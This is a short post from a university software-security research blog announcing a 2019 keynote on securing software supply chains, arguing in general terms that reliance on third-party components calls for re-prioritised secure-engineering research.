Posted on by Achim D. Brucker, licensed under CC BY-ND 4.0.

Securing Software Supply Chains

Today, Software is rarely developed “on the green field”: software developers are “composers” that build new system by combining existing solutions. Custom code is, in many development projects, a curiosity.

As a result, modern software depends on numerous third-party projects, which, sometimes, are as small as three lines of code or as large as several millions lines of code. On the one hand, these projects speed up the development. On the other hand, their use requires trust and care: with a few lines of code in an installation script, your development system can be attacked or a small vulnerability in a dependency can be the root cause of one of the largest data leaks of the last years.

Want to learn more? Attend my keynote at the International Workshop on Secure Software Engineering (SSE 2019). In my keynote, I will argue that the mature tools and techniques for developing secure software do not work well in an environment where software is composed instead of developed. By using real world examples of third-party components, I will make the case that research in secure software engineering needs to re-prioritize topics to be fit for a world of software composition.

Welcome to the blog of the Software Assurance & Security Research Team at the University of Exeter. We blog regularly news, tips & tricks, as well as fun facts about software assurance, reliability, security, testing, verification, hacking, and logic.

You can also follow us on Twitter: @logicalhacking.




academia ai android apidesign appsec bitcoin blockchain bpmn browser browserextensions browsersecurity bug certification chrome composition cordova dast devops devsecops dom dsbd efsm epsrc event extensions fixeffort floss formaldocument formalmethods funding hol-ocl hol-testgen humanfactor hybridapps iast industry internetofthings iot isabelle/hol isabelledof isadof latex logic maintance malicous mbst mobile mobile apps modelinference modeling monads monitoring msc ocl ontology opensource owasp patches pet phd phdlife phishing policy protocols publishing reliability research safelinks safety sap sast sdlc secdevops secureprogramming security securityengineering securitytesting semantics servicecomposition skills smartcontract smartthings softwareeinginering softwaresecurity softwaresupplychain solidity staff&positions statemachine studentproject tcb test&proof testing tips&tricks tools transport tuos uk uoe upgrade usability verification vulnerabilities vulnerableapplication webinar websecurity


blog whole site